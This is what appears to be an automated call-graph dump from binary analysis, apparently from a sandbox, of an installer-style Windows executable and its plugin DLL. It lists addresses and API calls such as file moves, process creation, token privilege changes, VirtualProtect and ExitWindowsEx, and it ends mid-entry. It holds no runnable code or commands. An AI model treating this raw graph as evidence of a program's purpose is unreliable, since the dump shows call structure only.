3318->3319 3320 70021d4e __alldvrm 3318->3320 3319->3320 3321 700215eb 2 API calls 3320->3321 3322 70021de5 GlobalFree GlobalFree 3321->3322 2808 70021a4a 2809 70021aa1 2808->2809 2810 70021a5a VirtualProtect 2808->2810 2810->2809 3323 70021b0a 3324 70021b38 3323->3324 3325 70022351 21 API calls 3324->3325 3326 70021b3f 3325->3326 3327 70021b52 3326->3327 3328 70021b46 3326->3328 3329 70021b73 3327->3329 3330 70021b5c 3327->3330 3331 700215eb 2 API calls 3328->3331 3334 70021b79 3329->3334 3335 70021b9f 3329->3335 3333 700215c5 2 API calls 3330->3333 3332 70021b50 3331->3332 3337 70021b61 3333->3337 3338 70021668 2 API calls 3334->3338 3336 700215c5 2 API calls 3335->3336 3336->3332 3339 70021668 2 API calls 3337->3339 3340 70021b7e 3338->3340 3341 70021b67 3339->3341 3342 700215eb 2 API calls 3340->3342 3343 700215eb 2 API calls 3341->3343 3344 70021b84 GlobalFree 3342->3344 3345 70021b6d GlobalFree 3343->3345 3344->3332 3344->3345 3347 70022c6a 3348 70022cc3 3347->3348 3349 70022cd8 3347->3349 3348->3349 3350 70022ccd GetLastError 3348->3350 3350->3349 3367 40362d 3368 403653 3367->3368 3369 40363f SetTimer 3367->3369 3370 40365c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3368->3370 3371 4036aa 3368->3371 3369->3370 3370->3371 2415 404f70 2416 405111 2415->2416 2417 404f8f 2415->2417 2418 405125 GetDlgItem GetDlgItem 2416->2418 2438 40515e 2416->2438 2417->2416 2419 404f9b 2417->2419 2420 4054f8 18 API calls 2418->2420 2421 404fa0 SetWindowPos 2419->2421 2422 404fba 2419->2422 2423 405148 SetClassLongW 2420->2423 2425 4050fd 2421->2425 2427 40500d 2422->2427 2428 404fbf ShowWindow 2422->2428 2431 401533 90 API calls 2423->2431 2424 4051b5 2433 40510c 2424->2433 2486 4054c6 2424->2486 2525 405739 2425->2525 2429 405015 DestroyWindow 2427->2429 2430 40502f 2427->2430 2428->2425 2434 404fe4 GetWindowLongW 2428->2434 2435 405446 2429->2435 2436 405034 SetWindowLongW 2430->2436 2437 405047 2430->2437 2431->2438 2432 401399 90 API calls 2439 40518e 2432->2439 2434->2425 2441 405000 ShowWindow 2434->2441 2435->2433 2446 405479 ShowWindow 2435->2446 2436->2433 2437->2425 2444 405053 GetDlgItem 2437->2444 2438->2424 2438->2432 2439->2424 2445 405192 SendMessageW 2439->2445 2441->2425 2442 401533 90 API calls 2455 4051c7 2442->2455 2443 405448 DestroyWindow EndDialog 2443->2435 2447 405092 2444->2447 2448 40506f SendMessageW IsWindowEnabled 2444->2448 2445->2433 2446->2433 2451 4050a1 2447->2451 2453 4050e4 SendMessageW 2447->2453 2454 4050b3 2447->2454 2462 405099 2447->2462 2448->2433 2450 40508e 2448->2450 2450->2447 2451->2453 2451->2462 2453->2425 2457 4050ca 2454->2457 2458 4050bc 2454->2458 2455->2433 2455->2442 2455->2443 2461 4054f8 18 API calls 2455->2461 2477 405388 DestroyWindow 2455->2477 2489 405e98 2455->2489 2506 4054f8 2455->2506 2456 4050e2 2456->2425 2460 401533 90 API calls 2457->2460 2519 401533 2458->2519 2463 4050d1 2460->2463 2461->2455 2522 405936 2462->2522 2463->2425 2463->2462 2465 40524b GetDlgItem 2466 405272 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 2465->2466 2470 405266 2465->2470 2466->2470 2467 4052c7 GetSystemMenu EnableMenuItem SendMessageW 2468 4052f4 SendMessageW 2467->2468 2467->2470 2468->2470 2470->2466 2470->2467 2509 4054e1 SendMessageW 2470->2509 2510 405cf9 2470->2510 2513 406af8 lstrcpynW 2470->2513 2473 405326 lstrlenW 2474 405e98 17 API calls 2473->2474 2475 405340 SetWindowTextW 2474->2475 2514 401399 2475->2514 2477->2435 2478 4053a2 CreateDialogParamW 2477->2478 2478->2435 2479 4053d5 2478->2479 2480 4054f8 18 API calls 2479->2480 2481 4053e0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2480->2481 2482 401399 90 API calls 2481->2482 2483 405426 2482->2483 2483->2433 2484 40542e ShowWindow 2483->2484 2485 4054c6 SendMessageW 2484->2485 2485->2435 2487 4054de 2486->2487 2488 4054cf SendMessageW 2486->2488 2487->2455 2488->2487 2500 405ea3 2489->2500 2490 4060f1 2490->2455 2491 4060dc 2491->2490 2546 406af8 lstrcpynW 2491->2546 2494 4060a7 lstrlenW 2494->2500 2495 405fbc GetSystemDirectoryW 2495->2500 2497 405e98 10 API calls 2497->2494 2498 405fcf GetWindowsDirectoryW 2498->2500 2500->2491 2500->2494 2500->2495 2500->2497 2500->2498 2501 405ffc SHGetSpecialFolderLocation 2500->2501 2503 405e98 10 API calls 2500->2503 2504 406d1b CharNextW CharNextW CharNextW CharNextW CharPrevW 2500->2504 2505 406048 lstrcatW 2500->2505 2539 406955 2500->2539 2544 4065fd wsprintfW 2500->2544 2545 406af8 lstrcpynW 2500->2545 2501->2500 2502 406014 SHGetPathFromIDListW CoTaskMemFree 2501->2502 2502->2500 2503->2500 2504->2500 2505->2500 2507 405e98 17 API calls 2506->2507 2508 405503 SetDlgItemTextW 2507->2508 2508->2465 2509->2470 2511 405e98 17 API calls 2510->2511 2512 405d07 SetWindowTextW 2511->2512 2512->2470 2513->2473 2516 401413 2514->2516 2517 4013a3 2514->2517 2516->2455 2517->2516 2518 4013df MulDiv SendMessageW 2517->2518 2551 40154a 2517->2551 2518->2517 2520 401399 90 API calls 2519->2520 2521 401547 2520->2521 2521->2462 2523 405943 SendMessageW 2522->2523 2524 40593d 2522->2524 2523->2456 2524->2523 2526 405751 GetWindowLongW 2525->2526 2536 405807 2525->2536 2527 405766 2526->2527 2526->2536 2528 40579a 2527->2528 2529 40578e GetSysColor 2527->2529 2527->2536 2530 4057a8 SetBkMode 2528->2530 2531 40579e SetTextColor 2528->2531 2529->2528 2532 4057d0 2530->2532 2533 4057c1 GetSysColor 2530->2533 2531->2530 2534 4057e1 2532->2534 2535 4057d4 SetBkColor 2532->2535 2533->2532 2534->2536 2537 4057f1 DeleteObject 2534->2537 2538 4057fa CreateBrushIndirect 2534->2538 2535->2534 2536->2433 2537->2538 2538->2536 2547 4062b6 2539->2547 2542 4069bb 2542->2500 2543 40698a RegQueryValueExW RegCloseKey 2543->2542 2544->2500 2545->2500 2546->2490 2548 4062c5 2547->2548 2549 4062c9 2548->2549 2550 4062ce RegOpenKeyExW 2548->2550 2549->2542 2549->2543 2550->2549 2552 4015c3 2551->2552 2602 4015ce 2551->2602 2553 4016c1 2552->2553 2554 4017c2 2552->2554 2555 4015e6 2552->2555 2556 4018cb 2552->2556 2557 4016ef 2552->2557 2558 4016af 2552->2558 2559 40182f 2552->2559 2560 401711 2552->2560 2561 401633 SetForegroundWindow 2552->2561 2562 4017d3 2552->2562 2563 4015d5 2552->2563 2564 401618 2552->2564 2565 4015f9 2552->2565 2566 40189b 2552->2566 2567 4018de 2552->2567 2568 40163f 2552->2568 2552->2602 2636 40160c 2552->2636 2579 4016d1 ShowWindow 2553->2579 2580 4016d9 2553->2580 2570 40303e 17 API calls 2554->2570 2569 4015f0 PostQuitMessage 2555->2569 2555->2602 2574 40303e 17 API calls 2556->2574 2665 40303e 2557->2665 2734 4065fd wsprintfW 2558->2734 2577 40303e 17 API calls 2559->2577 2571 40303e 17 API calls 2560->2571 2561->2602 2573 40303e 17 API calls 2562->2573 2592 405d18 24 API calls 2563->2592 2563->2602 2662 403002 2564->2662 2595 401399 73 API calls 2565->2595 2572 40303e 17 API calls 2566->2572 2576 40303e 17 API calls 2567->2576 2599 403002 17 API calls 2568->2599 2568->2602 2569->2602 2582 4017c8 2570->2582 2583 401718 2571->2583 2584 4018a2 SearchPathW 2572->2584 2586 4017da 2573->2586 2587 4018d2 2574->2587 2589 4018e5 2576->2589 2590 401835 GetFullPathNameW 2577->2590 2579->2580 2591 4016e6 ShowWindow 2580->2591 2580->2602 2738 4065ad FindFirstFileW 2582->2738 2670 406ba3 CharNextW CharNextW 2583->2670 2584->2602 2585 405d18 24 API calls 2585->2602 2597 40303e 17 API calls 2586->2597 2700 406a34 2587->2700 2588 40161e Sleep 2588->2602 2606 401906 2589->2606 2607 40190e 2589->2607 2600 401857 2590->2600 2601 40184d 2590->2601 2591->2602 2592->2602 2595->2602 2603 4017e3 2597->2603 2599->2602 2600->2601 2613 4065ad 2 API calls 2600->2613 2601->2602 2604 401889 GetShortPathNameW 2601->2604 2602->2517 2605 40303e 17 API calls 2603->2605 2604->2602 2609 4017ec MoveFileW 2605->2609 2746 406af8 lstrcpynW 2606->2746 2747 406af8 lstrcpynW 2607->2747 2614 401804 2609->2614 2609->2636 2612 401790 2688 405d18 2612->2688 2618 40186a 2613->2618 2614->2602 2621 4065ad 2 API calls 2614->2621 2615 40190c 2704 406d1b 2615->2704 2616 401919 2748 406534 lstrlenW CharPrevW 2616->2748 2618->2601 2745 406af8 lstrcpynW 2618->2745 2628 401814 2621->2628 2628->2602 2741 40621b MoveFileExW 2628->2741 2629 4017a2 SetCurrentDirectoryW 2629->2602 2631 401720 2632 401769 GetFileAttributesW 2631->2632 2633 401780 2631->2633 2676 4065d4 2631->2676 2680 4064da 2631->2680 2683 405e1c CreateDirectoryW 2631->2683 2735 405dfc CreateDirectoryW 2631->2735 2632->2631 2633->2612 2633->2636 2634 401968 2751 406b7b GetFileAttributesW 2634->2751 2636->2585 2637 4065ad 2 API calls 2653 40192b 2637->2653 2640 40193f CompareFileTime 2640->2653 2641 401a18 2643 405d18 24 API calls 2641->2643 2642 4019fd 2645 405d18 24 API calls 2642->2645 2646 401a24 2643->2646 2644 406af8 lstrcpynW 2644->2653 2645->2602 2714 403148 2646->2714 2649 401a52 SetFileTime 2650 401a60 CloseHandle 2649->2650 2650->2602 2652 401a73 2650->2652 2651 405e98 17 API calls 2651->2653 2654 401a78 2652->2654 2655 401a89 2652->2655 2653->2563 2653->2634 2653->2637 2653->2640 2653->2641 2653->2642 2653->2644 2653->2651 2713 4068f9 GetFileAttributesW CreateFileW 2653->2713 2754 406a86 2653->2754 2656 405e98 17 API calls 2654->2656 2657 405e98 17 API calls 2655->2657 2658 401a80 lstrcatW 2656->2658 2659 401a91 2657->2659 2658->2659 2661 406a86 MessageBoxIndirectW 2659->2661 2661->2602 2663 405e98 17 API calls 2662->2663 2664 403016 2663->2664 2664->2588 2666 405e98 17 API calls 2665->2666 2667 403067 2666->2667 2668 4016f6 SetFileAttributesW 2667->2668 2669 406d1b 5 API calls 2667->2669 2668->2602 2669->2668 2671 406bc1 2670->2671 2672 406bf8 2670->2672 2673 406bd0 CharNextW 2671->2673 2674 406bd5 2671->2674 2672->2631 2673->2672 2674->2672 2675 4065d4 CharNextW 2674->2675 2675->2674 2677 4065e0 2676->2677 2678 4065fa 2676->2678 2677->2678 2679 4065e9 CharNextW 2677->2679 2678->2631 2679->2677 2679->2678 2758 4068c4 GetModuleHandleA 2680->2758 2684 405e67 GetLastError 2683->2684 2685 405e8a 2683->2685 2684->2685 2686 405e74 SetFileSecurityW 2684->2686 2685->2631 2686->2685 2687 405e8e GetLastError 2686->2687 2687->2685 2690 405d2a 2688->2690 2695 401797 2688->2695 2689 405d49 lstrlenW 2692 405d5b lstrlenW 2689->2692 2693 405d7e 2689->2693 2690->2689 2691 405e98 17 API calls 2690->2691 2691->2689 2694 405d70 lstrcatW 2692->2694 2692->2695 2696 405d95 2693->2696 2697 405d88 SetWindowTextW 2693->2697 2694->2693 2699 406af8 lstrcpynW 2695->2699 2696->2695 2698 405d9a SendMessageW SendMessageW SendMessageW 2696->2698 2697->2696 2698->2695 2699->2629 2701 406a41 GetTickCount GetTempFileNameW 2700->2701 2702 406a75 2701->2702 2703 406a79 2701->2703 2702->2701 2702->2703 2703->2602 2707 406d30 2704->2707 2705 406db2 2706 406dba CharPrevW 2705->2706 2709 406dda 2705->2709 2706->2705 2707->2705 2708 406da3 CharNextW 2707->2708 2710 4065d4 CharNextW 2707->2710 2711 406d8f CharNextW 2707->2711 2712 406d9e CharNextW 2707->2712 2708->2705 2708->2707 2709->2653 2710->2707 2711->2707 2712->2708 2713->2653 2715 403190 2714->2715 2716 403183 2714->2716 2767 406926 ReadFile 2715->2767 2774 403131 SetFilePointer 2716->2774 2720 4031b6 GetTickCount 2727 4031e6 2720->2727 2730 401a3a 2720->2730 2721 4032f9 2722 403340 2721->2722 2726 4032fd 2721->2726 2723 40311b ReadFile 2722->2723 2723->2730 2725 40311b ReadFile 2725->2726 2726->2725 2728 4069e9 WriteFile 2726->2728 2726->2730 2729 40323d GetTickCount 2727->2729 2727->2730 2731 40326e MulDiv wsprintfW 2727->2731 2769 40311b 2727->2769 2772 4069e9 WriteFile 2727->2772 2728->2726 2729->2727 2730->2649 2730->2650 2732 405d18 24 API calls 2731->2732 2732->2727 2734->2602 2736 405e16 2735->2736 2737 405e0e GetLastError 2735->2737 2736->2631 2737->2736 2739 4065c3 FindClose 2738->2739 2740 4065ce 2738->2740 2739->2740 2740->2602 2742 40623c 2741->2742 2743 40622f 2741->2743 2742->2636 2775 4062e4 2743->2775 2745->2601 2746->2615 2747->2616 2749 406551 lstrcatW 2748->2749 2750 40191f lstrcatW 2748->2750 2749->2750 2750->2615 2752 406b9d 2751->2752 2753 406b8d SetFileAttributesW 2751->2753 2752->2653 2753->2752 2755 406a9b 2754->2755 2756 406ae9 2755->2756 2757 406ab1 MessageBoxIndirectW 2755->2757 2756->2653 2757->2756 2759 4068e6 GetProcAddress 2758->2759 2760 4068dc 2758->2760 2762 4064e1 2759->2762 2764 40617c GetSystemDirectoryW 2760->2764 2762->2631 2763 4068e2 2763->2759 2763->2762 2766 40619e wsprintfW LoadLibraryExW 2764->2766 2766->2763 2768 4031a2 2767->2768 2768->2720 2768->2721 2768->2730 2770 406926 ReadFile 2769->2770 2771 40312e 2770->2771 2771->2727 2773 406a0a 2772->2773 2773->2727 2774->2715 2776 406314 2775->2776 2777 40633a GetShortPathNameW 2775->2777 2802 4068f9 GetFileAttributesW CreateFileW 2776->2802 2779 40641a 2777->2779 2780 40634f 2777->2780 2779->2742 2780->2779 2782 406357 wsprintfA 2780->2782 2781 40631e CloseHandle GetShortPathNameW 2781->2779 2783 406332 2781->2783 2784 405e98 17 API calls 2782->2784 2783->2777 2783->2779 2785 406380 2784->2785 2803 4068f9 GetFileAttributesW CreateFileW 2785->2803 2787 40638d 2787->2779 2788 406398 GetFileSize GlobalAlloc 2787->2788 2789 406413 CloseHandle 2788->2789 2790 4063b7 2788->2790 2789->2779 2791 406926 ReadFile 2790->2791 2792 4063bf 2791->2792 2792->2789 2804 406b14 lstrlenA lstrlenA 2792->2804 2795 4063d2 lstrcpyA 2798 4063e4 2795->2798 2796 40641f 2797 406b14 3 API calls 2796->2797 2797->2798 2799 4063f5 SetFilePointer 2798->2799 2800 4069e9 WriteFile 2799->2800 2801 40640c GlobalFree 2800->2801 2801->2789 2802->2781 2803->2787 2805 4063ce 2804->2805 2806 406b33 2804->2806 2805->2795 2805->2796 2806->2805 2807 406b60 lstrlenA 2806->2807 2807->2805 2807->2806 2811 7002167a 2812 700216b7 2811->2812 2853 70022351 2812->2853 2814 700216be 2815 700217ef 2814->2815 2816 700216d6 2814->2816 2817 700216cf 2814->2817 2883 70022049 2816->2883 2899 70021fcb 2817->2899 2822 70021722 2912 70022209 2822->2912 2823 70021740 2826 70021791 2823->2826 2827 70021746 2823->2827 2824 7002170a 2839 70021700 2824->2839 2909 70022f9f 2824->2909 2825 700216eb 2829 700216f5 2825->2829 2834 70021702 2825->2834 2832 70022209 9 API calls 2826->2832 2930 70021f1e 2827->2930 2829->2839 2893 70022d14 2829->2893 2843 7002177e 2832->2843 2833 70021728 2922 70021668 2833->2922 2903 700217f7 2834->2903 2839->2822 2839->2823 2840 70021708 2840->2839 2841 70022209 9 API calls 2841->2843 2844 700217de 2843->2844 2933 7002200d 2843->2933 2844->2815 2846 700217e8 GlobalFree 2844->2846 2846->2815 2850 700217cf 2850->2844 2937 700215c5 2850->2937 2852 700217c2 FreeLibrary 2852->2850 2941 700212f8 GlobalAlloc 2853->2941 2855 7002237f 2942 700212f8 GlobalAlloc 2855->2942 2857 70022a3a GlobalFree GlobalFree GlobalFree 2858 70022a5a 2857->2858 2873 70022aa7 2857->2873 2859 70022af7 2858->2859 2864 70022a73 2858->2864 2858->2873 2860 70022b19 GetModuleHandleW 2859->2860 2859->2873 2862 70022b2a LoadLibraryW 2860->2862 2863 70022b3f 2860->2863 2861 70022947 GlobalAlloc 2878 7002238a 2861->2878 2862->2863 2862->2873 2949 70021f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2863->2949 2870 700212e1 2 API calls 2864->2870 2864->2873 2866 7002299f lstrcpyW 2866->2878 2867 700229bd GlobalFree 2867->2878 2868 70022b8e 2869 70022b9c lstrlenW 2868->2869 2868->2873 2950 70021f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2869->2950 2870->2873 2871 700229af lstrcpyW 2871->2878 2873->2814 2874 70022b4c 2874->2868 2881 70022b78 GetProcAddress 2874->2881 2875 70022bb6 2875->2873 2877 70022822 GlobalFree 2877->2878 2878->2857 2878->2861 2878->2866 2878->2867 2878->2871 2878->2877 2880 700229fb 2878->2880 2943 700212f8 GlobalAlloc 2878->2943 2944 700212e1 2878->2944 2880->2878 2947 70021309 GlobalSize GlobalAlloc 2880->2947 2881->2868 2890 7002205e 2883->2890 2885 70022124 GlobalAlloc WideCharToMultiByte 2887 700221be GlobalFree 2885->2887 2886 70022154 GlobalAlloc CLSIDFromString 2886->2890 2888 700216dc 2887->2888 2887->2890 2888->2824 2888->2825 2888->2839 2889 700212e1 lstrcpynW GlobalAlloc 2889->2890 2890->2885 2890->2886 2890->2887 2890->2889 2892 70022179 2890->2892 2952 70021548 2890->2952 2892->2887 2957 700219db 2892->2957 2894 70022d26 2893->2894 2895 70022dcb ReadFile 2894->2895 2898 70022de9 2895->2898 2960 70022cbf 2898->2960 2900 70021fde 2899->2900 2901 70021fe9 GlobalAlloc 2900->2901 2902 700216d5 2900->2902 2901->2900 2902->2816 2907 70021823 2903->2907 2904 70021897 GlobalAlloc 2908 700218b5 2904->2908 2905 700218a8 2906 700218ac GlobalSize 2905->2906 2905->2908 2906->2908 2907->2904 2907->2905 2908->2840 2910 70022faa 2909->2910 2911 70022fea GlobalFree 2910->2911 2963 700212f8 GlobalAlloc 2912->2963 2914 70022280 MultiByteToWideChar 2918 70022211 2914->2918 2915 700222a6 StringFromGUID2 2915->2918 2916 700222b7 lstrcpynW 2916->2918 2917 700222ee GlobalFree 2917->2918 2918->2914 2918->2915 2918->2916 2918->2917 2919 70022325 GlobalFree 2918->2919 2920 700215eb 2 API calls 2918->2920 2964 70021638 2918->2964 2919->2833 2920->2918 2968 700212f8 GlobalAlloc 2922->2968 2924 7002166d 2925 70021f1e lstrcpyW 2924->2925 2926 70021677 2925->2926 2927 700215eb 2926->2927 2928 70021633 GlobalFree 2927->2928 2929 700215f4 GlobalAlloc lstrcpynW 2927->2929 2928->2843 2929->2928 2931 70021f5c lstrcpyW 2930->2931 2932 70021765 2930->2932 2931->2932 2932->2841 2934 7002201c 2933->2934 2935 700217a4 2933->2935 2934->2935 2936 70022033 GlobalFree 2934->2936 2935->2850 2935->2852 2936->2934 2938 700215dd 2937->2938 2939 700215eb 2 API calls 2938->2939 2940 700215e6 2939->2940 2940->2844 2941->2855 2942->2878 2943->2878 2951 700212f8 GlobalAlloc 2944->2951 2946 700212f0 lstrcpynW 2946->2878 2948 70021327 2947->2948 2948->2880 2949->2874 2950->2875 2951->2946 2953 70021555 2952->2953 2954 700212f8 GlobalAlloc 2952->2954 2955 700212e1 2 API calls 2953->2955 2954->2890 2956 7002156a 2955->2956 2956->2890 2958 700219ea VirtualAlloc 2957->2958 2959 70021a48 2957->2959 2958->2959 2959->2892 2961 70022cd8 2960->2961 2962 70022ccd GetLastError 2960->2962 2961->2839 2962->2961 2963->2918 2965 70021663 2964->2965 2966 7002163f 2964->2966 2965->2918 2966->2965 2967 70021648 lstrcpyW 2966->2967 2967->2965 2968->2924 3351 7002103a 3352 70021052 3351->3352 3353 700210c5 3352->3353 3354 70021081 3352->3354 3355 70021061 3352->3355 3357 7002156c GlobalFree 3354->3357 3356 7002156c GlobalFree 3355->3356 3358 70021072 3356->3358 3361 70021079 3357->3361 3359 7002156c GlobalFree 3358->3359 3359->3361 3360 70021091 GlobalSize 3362 7002109a 3360->3362 3361->3360 3361->3362 3363 7002109e GlobalAlloc 3362->3363 3366 700210af 3362->3366 3364 700215c5 2 API calls 3363->3364 3364->3366 3365 700210b8 GlobalFree 3365->3353 3366->3365 2969 4036da SetErrorMode GetVersionExW 2970 403725 GetVersionExW 2969->2970 2972 40375c 2969->2972 2971 403747 2970->2971 2971->2972 2973 4037c3 2972->2973 2974 4068c4 5 API calls 2972->2974 2975 40617c 3 API calls 2973->2975 2974->2973 2976 4037d9 lstrlenA 2975->2976 2976->2973 2977 4037e7 2976->2977 2978 4068c4 5 API calls 2977->2978 2979 4037ee 2978->2979 2980 4068c4 5 API calls 2979->2980 2981 4037f5 2980->2981 2982 4068c4 5 API calls 2981->2982 2983 403801 #17 OleInitialize SHGetFileInfoW 2982->2983 3059 406af8 lstrcpynW 2983->3059 2986 40384f GetCommandLineW 3060 406af8 lstrcpynW 2986->3060 2988 403860 2989 4065d4 CharNextW 2988->2989 2990 40389a CharNextW 2989->2990 2991 403988 GetTempPathW 2990->2991 2998 4038b3 2990->2998 3061 403c83 2991->3061 2993 4039a0 2994 4039a4 GetWindowsDirectoryW lstrcatW 2993->2994 2995 4039fa DeleteFileW 2993->2995 2996 403c83 12 API calls 2994->2996 3071 4033cb GetTickCount GetModuleFileNameW 2995->3071 2999 4039c0 2996->2999 2998->2991 3000 4065d4 CharNextW 2998->3000 3007 403974 2998->3007 2999->2995 3002 4039c4 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2999->3002 3000->2998 3001 403a0d 3004 4065d4 CharNextW 3001->3004 3011 403a90 3001->3011 3044 403a82 3001->3044 3003 403c83 12 API calls 3002->3003 3008 4039f2 3003->3008 3017 403a2c 3004->3017 3160 406af8 lstrcpynW 3007->3160 3008->2995 3008->3011 3178 4036b0 3011->3178 3012 403bd7 3014 406a86 MessageBoxIndirectW 3012->3014 3013 403bea 3015 403bf3 GetCurrentProcess OpenProcessToken 3013->3015 3016 403be2 ExitProcess 3013->3016 3014->3016 3021 403c0b LookupPrivilegeValueW AdjustTokenPrivileges 3015->3021 3022 403c3f 3015->3022 3018 403a56 3017->3018 3019 403a97 3017->3019 3161 406616 3018->3161 3024 4064da 5 API calls 3019->3024 3021->3022 3023 4068c4 5 API calls 3022->3023 3026 403c46 3023->3026 3027 403a9c lstrcatW 3024->3027 3029 403c5b ExitWindowsEx 3026->3029 3032 403c68 3026->3032 3030 403ac0 lstrcatW lstrcmpiW 3027->3030 3031 403ab1 lstrcatW 3027->3031 3029->3016 3029->3032 3030->3011 3033 403ae7 3030->3033 3031->3030 3035 401533 90 API calls 3032->3035 3036 403af0 3033->3036 3037 403af7 3033->3037 3035->3016 3039 405e1c 4 API calls 3036->3039 3040 405dfc 2 API calls 3037->3040 3038 403a77 3176 406af8 lstrcpynW 3038->3176 3042 403af5 3039->3042 3043 403afc SetCurrentDirectoryW 3040->3043 3042->3043 3045 403b10 3043->3045 3046 403b1f 3043->3046 3099 405a1c 3044->3099 3177 406af8 lstrcpynW 3045->3177 3156 406af8 lstrcpynW 3046->3156 3049 405e98 17 API calls 3050 403b4f DeleteFileW 3049->3050 3051 403b5a CopyFileW 3050->3051 3056 403b2d 3050->3056 3051->3056 3052 403bb3 3053 40621b 35 API calls 3052->3053 3053->3011 3054 40621b 35 API calls 3054->3056 3055 405e98 17 API calls 3055->3056 3056->3049 3056->3052 3056->3054 3056->3055 3058 403b9e CloseHandle 3056->3058 3157 4066b4 CreateProcessW 3056->3157 3058->3056 3059->2986 3060->2988 3062 406d1b 5 API calls 3061->3062 3064 403c8f 3062->3064 3063 403c99 3063->2993 3064->3063 3065 406534 3 API calls 3064->3065 3066 403ca1 3065->3066 3067 405dfc 2 API calls 3066->3067 3068 403ca7 3067->3068 3069 406a34 2 API calls 3068->3069 3070 403cb2 3069->3070 3070->2993 3185 4068f9 GetFileAttributesW CreateFileW 3071->3185 3073 40340d 3074 40341a 3073->3074 3186 406af8 lstrcpynW 3073->3186 3074->3001 3076 403430 3187 406cee lstrlenW 3076->3187 3080 403441 GetFileSize 3081 40345a 3080->3081 3095 403548 3080->3095 3081->3074 3083 40311b ReadFile 3081->3083 3084 403616 3081->3084 3094 403367 6 API calls 3081->3094 3081->3095 3083->3081 3089 403367 6 API calls 3084->3089 3085 403598 GlobalAlloc 3204 403131 SetFilePointer 3085->3204 3086 403557 3086->3074 3086->3085 3203 403131 SetFilePointer 3086->3203 3089->3074 3090 4035b5 3092 403148 31 API calls 3090->3092 3091 403574 3093 406926 ReadFile 3091->3093 3097 4035c4 3092->3097 3096 403586 3093->3096 3094->3081 3192 403367 3095->3192 3096->3074 3096->3085 3097->3074 3097->3097 3098 4035f4 SetFilePointer 3097->3098 3098->3074 3100 4068c4 5 API calls 3099->3100 3101 405a30 3100->3101 3102 405a39 3101->3102 3103 405a4b 3101->3103 3217 4065fd wsprintfW 3102->3217 3104 406955 3 API calls 3103->3104 3105 405a7a 3104->3105 3107 405a99 lstrcatW 3105->3107 3109 406955 3 API calls 3105->3109 3108 405a49 3107->3108 3209 40595d 3108->3209 3109->3107 3112 406616 18 API calls 3113 405acb 3112->3113 3114 405b65 3113->3114 3116 406955 3 API calls 3113->3116 3115 406616 18 API calls 3114->3115 3117 405b6b 3115->3117 3118 405afe 3116->3118 3119 405b7b LoadImageW 3117->3119 3120 405e98 17 API calls 3117->3120 3118->3114 3123 405b22 lstrlenW 3118->3123 3128 4065d4 CharNextW 3118->3128 3121 405c28 3119->3121 3122 405bab RegisterClassW 3119->3122 3120->3119 3126 401533 90 API calls 3121->3126 3124 405bd8 3122->3124 3125 405bdf SystemParametersInfoW CreateWindowExW 3122->3125 3129 405b32 lstrcmpiW 3123->3129 3130 405b58 3123->3130 3124->3011 3125->3121 3127 405c2e 3126->3127 3127->3124 3134 40595d 18 API calls 3127->3134 3132 405b1d 3128->3132 3129->3130 3133 405b42 GetFileAttributesW 3129->3133 3131 406534 3 API calls 3130->3131 3135 405b5e 3131->3135 3132->3123 3136 405b4e 3133->3136 3138 405c3b 3134->3138 3218 406af8 lstrcpynW 3135->3218 3136->3130 3137 406cee 2 API calls 3136->3137 3137->3130 3140 405c47 ShowWindow 3138->3140 3141 405cc9 3138->3141 3143 40617c 3 API calls 3140->3143 3219 405842 OleInitialize 3141->3219 3145 405c5f 3143->3145 3144 405ccf 3146 405cd3 3144->3146 3147 405ced 3144->3147 3148 405c6d GetClassInfoW 3145->3148 3149 40617c 3 API calls 3145->3149 3146->3124 3153 401533 90 API calls 3146->3153 3150 401533 90 API calls 3147->3150 3151 405c80 GetClassInfoW RegisterClassW 3148->3151 3152 405c96 DialogBoxParamW 3148->3152 3149->3148 3154 405cf4 3150->3154 3151->3152 3155 401533 90 API calls 3152->3155 3153->3124 3154->3154 3155->3124 3156->3056 3158 4066f3 3157->3158 3159 4066e7 CloseHandle 3157->3159 3158->3056 3159->3158 3160->2991 3227 406af8 lstrcpynW 3161->3227 3163 406627 3164 406ba3 4 API calls 3163->3164 3165 40662d 3164->3165 3166 406d1b 5 API calls 3165->3166 3173 403a64 3165->3173 3167 406639 3166->3167 3168 406669 lstrlenW 3167->3168 3170 4065ad 2 API calls 3167->3170 3167->3173 3174 406cee 2 API calls 3167->3174 3168->3167 3169 406675 3168->3169 3171 406534 3 API calls 3169->3171 3170->3167 3172 40667a GetFileAttributesW 3171->3172 3172->3173 3173->3011 3175 406af8 lstrcpynW 3173->3175 3174->3168 3175->3038 3176->3044 3177->3046 3179 4036c8 3178->3179 3180 4036ba CloseHandle 3178->3180 3228 403cf1 3179->3228 3180->3179 3185->3073 3186->3076 3188 406cfd 3187->3188 3189 406d03 CharPrevW 3188->3189 3190 403436 3188->3190 3189->3188 3189->3190 3191 406af8 lstrcpynW 3190->3191 3191->3080 3193 403386 3192->3193 3194 40336e 3192->3194 3197 403397 GetTickCount 3193->3197 3198 40338f 3193->3198 3195 403377 DestroyWindow 3194->3195 3196 40337e 3194->3196 3195->3196 3196->3086 3200 4033a5 CreateDialogParamW ShowWindow 3197->3200 3201 4033ca 3197->3201 3205 4061ed 3198->3205 3200->3201 3201->3086 3203->3091 3204->3090 3206 4061ff PeekMessageW 3205->3206 3207 4061f5 DispatchMessageW 3206->3207 3208 403396 3206->3208 3207->3206 3208->3086 3210 405970 3209->3210 3226 4065fd wsprintfW 3210->3226 3212 4059e9 3213 405cf9 18 API calls 3212->3213 3215 4059ee 3213->3215 3214 405a17 3214->3112 3215->3214 3216 405e98 17 API calls 3215->3216 3216->3215 3217->3108 3218->3114 3220 4054c6 SendMessageW 3219->3220 3222 405865 3220->3222 3221 4054c6 SendMessageW 3223 40589e OleUninitialize 3221->3223 3224 401399 90 API calls 3222->3224 3225 40588c 3222->3225 3223->3144 3224->3222 3225->3221 3226->3212 3227->3163 3229 403cff 3228->3229 3230 403d04 FreeLibrary GlobalFree 3229->3230 3231 4036cd 3229->3231 3230->3230 3230->3231 3232 4066f7 3231->3232 3233 406616 18 API calls 3232->3233 3234 406719 3233->3234 3235 406722 DeleteFileW 3234->3235 3236 406739 3234->3236 3237 4036d9 OleUninitialize 3235->3237 3236->3237 3250 406859 3236->3250 3271 406af8 